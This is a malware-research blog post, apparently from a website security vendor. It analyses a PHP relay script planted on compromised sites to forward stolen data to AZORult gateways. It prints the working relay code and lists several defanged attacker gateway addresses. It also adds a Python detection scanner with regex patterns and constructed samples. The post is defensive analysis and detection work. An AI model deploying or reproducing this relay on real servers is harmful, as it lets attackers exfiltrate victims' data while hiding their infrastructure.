Labs Note

Evasive Maneuvers in Data Stealing Gateways

November 17, 2020, by Cesar Anjos


We have already shared examples of many kinds of malware that rely on an external gateway to receive or return data, for instance to fetch additional malware payloads or to hand off what was collected on the victim.

During a recent investigation, we came across this example of a PHP script that attackers reuse for many different purposes. What makes the sample interesting is that alongside this PHP file we also found a few data-stealing scripts, indicating that the code was being used to send sensitive data on to the attackers.

<?php
// Hard-coded destination: the real gateway the relayed data ends up at.
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";
$curl               = curl_init();
curl_setopt($curl, CURLOPT_URL, $AZORult2_gate_path);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);   // give up connecting after 10 s
curl_setopt($curl, CURLOPT_TIMEOUT, 600);         // but wait up to 10 minutes for the reply
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // capture the reply instead of printing it
curl_setopt($curl, CURLOPT_POST, true);
// Forward the raw request body this script received, byte for byte.
curl_setopt($curl, CURLOPT_POSTFIELDS, file_get_contents("php://input"));
// Pass the original client's IP address to the gateway in the Referer header.
curl_setopt($curl, CURLOPT_REFERER, $_SERVER['REMOTE_ADDR']);
// Return the gateway's reply to the caller, so the relay works in both directions.
echo curl_exec($curl);
curl_close($curl);
?>
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";

The variable $AZORult2_gate_path simply sets where the data will be sent. From there, a cURL session is created and configured to POST whatever this script itself just received: the raw body of the incoming request is read from the php://input stream and passed, unchanged, as CURLOPT_POSTFIELDS.

curl_setopt($curl, CURLOPT_POSTFIELDS, 
file_get_contents("php://input"));

This is one of the techniques attackers use to capture whatever was posted to the script. Reading php://input rather than $_POST yields the raw request body regardless of its encoding, so the data can be relayed verbatim to “hxxp://185.212.130.24/az/index.php”. Because CURLOPT_RETURNTRANSFER is set and the result is echoed, the gateway's reply also travels back to the caller, and the original client's address reaches the gateway in the Referer header via $_SERVER['REMOTE_ADDR'].

One important point to note is that this script can be planted on any compromised website and used as a relay: data stolen elsewhere is posted to the compromised site, which forwards it to the predefined gateway, essentially acting like a proxy. The infected machines and the stealer components only ever contact the compromised host, never the attackers' own infrastructure, and the real gateway address exists only inside this file on the server. This helps the attackers evade detection and keeps their footprint at a minimum after they breach the target.
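The two traits that make this file a relay are both visible in its source: it reads the raw request body from php://input, and it hands that body to cURL as POST data aimed at a hard-coded URL. The following scanner is an added example, not Sucuri's own tooling, that flags PHP files combining those two traits, extracts the destination URL and host as indicators, and notes whether the reply is echoed back and whether the client IP is forwarded in the Referer header. The three sample files are constructed for this example (the first is the script from the post, URL left defanged); the benign ones each share only one of the two traits and must not be flagged.

```python
"""Heuristic scanner for PHP "gateway relay" scripts like the one above.

Added example, not Sucuri's tooling. It flags PHP source that reads the raw
request body (php://input) and hands it straight to cURL as POST data, then
extracts the hard-coded destination as an indicator. Samples are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Trait 1: the script reads the raw body that was posted to it.
RAW_BODY_RE = re.compile(r"""file_get_contents\s*\(\s*['"]php://input['"]\s*\)""")
# Trait 2: it hands a body to cURL as outbound POST data.
POSTFIELDS_RE = re.compile(r"CURLOPT_POSTFIELDS")
# Hard-coded destination; accepts defanged hxxp:// as well as http(s)://.
URL_RE = re.compile(r"""['"](h(?:xx|tt)ps?://[^'"\s]+)['"]""")
# The gateway's reply is echoed back, so the relay works in both directions.
ECHO_RE = re.compile(r"echo\s+curl_exec\s*\(")
# The original client's address is passed on in the Referer header.
REFERER_RE = re.compile(r"""CURLOPT_REFERER\s*,\s*\$_SERVER\s*\[\s*['"]REMOTE_ADDR['"]\s*\]""")


@dataclass
class Finding:
    path: str
    gateways: List[str] = field(default_factory=list)  # full URLs as written in the file
    hosts: List[str] = field(default_factory=list)     # host[:port] part only, for blocklists
    bidirectional: bool = False
    leaks_client_ip: bool = False


def scan_php(path: str, source: str) -> Optional[Finding]:
    """Return a Finding when `source` shows both relay traits, else None."""
    if not (RAW_BODY_RE.search(source) and POSTFIELDS_RE.search(source)):
        return None
    gateways = URL_RE.findall(source)
    hosts = sorted({re.sub(r"^h(?:xx|tt)ps?://", "", u).split("/")[0] for u in gateways})
    return Finding(
        path=path,
        gateways=gateways,
        hosts=hosts,
        bidirectional=bool(ECHO_RE.search(source)),
        leaks_client_ip=bool(REFERER_RE.search(source)),
    )


def scan_tree(files: Dict[str, str]) -> List[Finding]:
    """Scan a {path: source} mapping; in practice, walk the web root instead."""
    results = []
    for path, source in sorted(files.items()):
        finding = scan_php(path, source)
        if finding:
            results.append(finding)
    return results


# Constructed samples: the relay from the post, plus two benign files that
# each have only one of the two traits and must not be flagged.
SAMPLES = {
    "wp-content/uploads/cache.php": r'''<?php
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $AZORult2_gate_path);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, file_get_contents("php://input"));
curl_setopt($curl, CURLOPT_REFERER, $_SERVER['REMOTE_ADDR']);
echo curl_exec($curl);
curl_close($curl);
''',
    # Reads the raw body (a JSON webhook receiver) but never forwards it.
    "api/webhook.php": r'''<?php
$event = json_decode(file_get_contents("php://input"), true);
file_put_contents(__DIR__ . "/events.log", json_encode($event) . "\n", FILE_APPEND);
''',
    # Posts with cURL, but only its own fixed payload, not the caller's body.
    "cron/ping.php": r'''<?php
$ch = curl_init("https://status.example.invalid/heartbeat");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["site" => $_SERVER["HTTP_HOST"]]));
curl_exec($ch);
''',
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLES):
        print(f"{f.path}: relays to {', '.join(f.gateways) or '?'}"
              f" (hosts: {', '.join(f.hosts)}; echoes reply: {f.bidirectional};"
              f" forwards client IP: {f.leaks_client_ip})")
```

Treat a hit as a triage signal rather than a verdict: a legitimate reverse-proxy or API pass-through script can show the same two traits, so confirm with the file's modification time, its location (an uploads or cache directory is a common hiding place) and the web server's access logs for the path before removing it, and add the extracted hosts to egress blocklists once confirmed.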

At the time of the investigation, attackers were using the following hosts as the end-point (the real gateway) for this infection:

hxxp://185.212.130.78/az/index.php
hxxp://185.212.130.41/amar/index.php
hxxp://185.212.130.24/az/index.php
hxxp://176.10.118.154

Bad actors are constantly updating their malware with new techniques and evasive maneuvers. To protect your website and catch malicious behavior such as an unexpected PHP file appearing in an uploads or cache directory, consider employing file integrity checks and security monitoring on your site.


Categories: Security Education, Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Labs Note, Malware, Redirects

About Cesar Anjos

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.
